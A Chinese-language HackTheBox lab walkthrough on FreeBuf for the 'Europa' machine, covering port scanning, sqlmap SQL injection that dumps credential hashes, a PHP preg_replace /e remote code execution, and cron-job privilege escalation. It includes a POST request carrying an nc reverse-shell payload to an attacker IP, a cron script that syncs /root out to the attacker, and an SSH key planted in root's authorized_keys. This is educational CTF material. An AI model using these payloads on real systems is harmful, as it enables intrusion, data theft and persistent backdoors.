freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Medium] Europa SQLI+preg_replace-RCE+D-link文件同步+cronjobs计划任务权限...
[Meachines] [Medium] Europa SQLI+preg_replace-RCE+D-link文件同步+cronjobs计划任务权限...
maptnh 2025-03-17 12:47:09 4081
所属地 福建省

Information Gathering

IP AddressOpening Ports
10.10.10.22TCP:22,80,443

$ ip='10.10.10.22'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b55420af7068c67c0e25c05db09fb78 (RSA)
|   256 b1ea5ec41c0a969e93db1dad22507475 (ECDSA)
|_  256 331f168dc024785f5bf56d7ff7b4f2e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

EuropaCorp Server Admin v0.2 beta SQLI

# echo '10.10.10.22 admin-portal.europacorp.htb europacorp.htb'>>/etc/hosts

https://admin-portal.europacorp.htb/login.php

image.png

$ sqlmap -r /tmp/sql.txt --force-ssl --batch

image-1.png

$ sqlmap -r /tmp/sql.txt --force-ssl --batch -D admin -T users --dump

image-2.png

+----+----------------------+----------+----------------------------------+---------------+
| id | email                | active   | password                         | username      |
+----+----------------------+----------+----------------------------------+---------------+
| 1  | admin@europacorp.htb | 1        | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2  | john@europacorp.htb  | 1        | 2b6d315337f18617ba18922c0b9597ff | john          |
+----+----------------------+----------+----------------------------------+---------------+

image-3.png

password:SuperSecretPassword!

image-4.png

preg_replace RCE

https://admin-portal.europacorp.htb/tools.php

image-6.png

image-5.png

参数pattern中/ip_address/ 被两个 / 包围,这通常是 正则表达式 的常见表示方式,尤其是在 JavaScript、PHP、Perl 等语言中。

image-7.png

POST /tools.php HTTP/1.1
Host: admin-portal.europacorp.htb
Cookie: PHPSESSID=c9u3dbpqf2974dt4tn7pn7uu07
Content-Length: 1707
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://admin-portal.europacorp.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin-portal.europacorp.htb/tools.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

pattern=%2Fx%2Fe&ipaddress=system("rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.33%20443%20%3E%2Ftmp%2Ff")&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++

image-8.png

image-9.png

username:john
password:iEOERHRiDnwkdnw

User.txt

ac3f97350181a4632c3395550968fb9b

Privilege Escalation:cronjobs && D-link Sync

image-10.png

image-11.png

文件同步

https://github.com/MartinxMax/dlink

攻击机:

$ ./dlink server --port 10098 --path /tmp/root & ./dlink server --port 10099 --path /tmp/root --reverse

image-12.png

靶机:

$ echo -e '#!/bin/bash\n\n/tmp/dlink client --endpoint "10.10.16.33:10098" --path /root & \n/tmp/dlink client --endpoint "10.10.16.33:10099" --path /root --reverse' > /var/www/cmd/logcleared.sh;chmod +x /var/www/cmd/logcleared.sh

image-13.png

文件同步工作了...
回到攻击机/tmp/root。该文件夹已同步镜像到靶机/root目录...

image-14.png

$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHW/AdC4GrFM0XNoi5DrRrmUCSfp5EE439+ay1c2JIQq maptnh@maptnh-H4CK13'>/tmp/root/.ssh/authorized_keys

image-15.png

Root.txt

14fea16f907013662508670e9efc16e5

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
黑客利用PHP严重漏洞部署Quasar RAT和XMRig挖矿软件
黑客利用PHP严重漏洞部署Quasar RAT和XMRig挖矿软件

漏洞

黑客利用PHP严重漏洞CVE-2024-4577,在Windows系统上部署Quasar RAT和XMRig挖矿软件。

AI小蜜蜂

72702围观 2025-03-19

为什么网络钓鱼防护需要突破电子邮件的局限
为什么网络钓鱼防护需要突破电子邮件的局限

Web安全

网络钓鱼攻击绕过了现有防御,MFA 不再安全,凭据窃取和账户接管威胁加剧!企业需突破传统防护,从浏览器层面拦截攻击,防止身份安全危机。

AI小蜜蜂

50985围观  · 1收藏  · 3喜欢 2025-03-19

[Meachines] [Medium] Stratosphere Struts-2-RCE+mysql转存储+python三方库劫持 原创
[Meachines] [Medium] Stratosphere Struts-2-RCE+mysql转存储+python三方库劫持

Web安全

#Java #Struts2 #mysql转存储 #python三方库劫持

maptnh

25058围观 2025-03-19

[Meachines] [Medium] Sneaky snmp+SSH-IPV6+BOF-NOP-Sled权限提升 原创
[Meachines] [Medium] Sneaky snmp+SSH-IPV6+BOF-NOP-Sled权限提升

Web安全

#snmp #SQLI #SSH #IPV6 #BOF #NOP-Sled权限提升

maptnh

24123围观 2025-03-19

CISA 警告 GitHub Action 供应链攻击已遭利用
CISA 警告 GitHub Action 供应链攻击已遭利用

漏洞

CISA 警告 GitHub Action 供应链攻击已遭利用。

AI小蜜蜂

55567围观 2025-03-19

maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 329 文章数
  • 62 关注者
[Meachines] [Medium] RedCross XSS+Firewall-RCE+BOF-ROP-PLT权限提升
2025-03-23
[Meachines] [Hard] Spooktrol uvicorn-LFI+C2-RE+D-Link-V2文件同步+ C2任务表注入权限提升
2025-03-22
D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux
2025-03-22
文章目录
Information Gathering
    EuropaCorp Server Admin v0.2 beta SQLI
      preg_replace RCE
        User.txt
          Privilege Escalation:cronjobs && D-link Sync
            Root.txt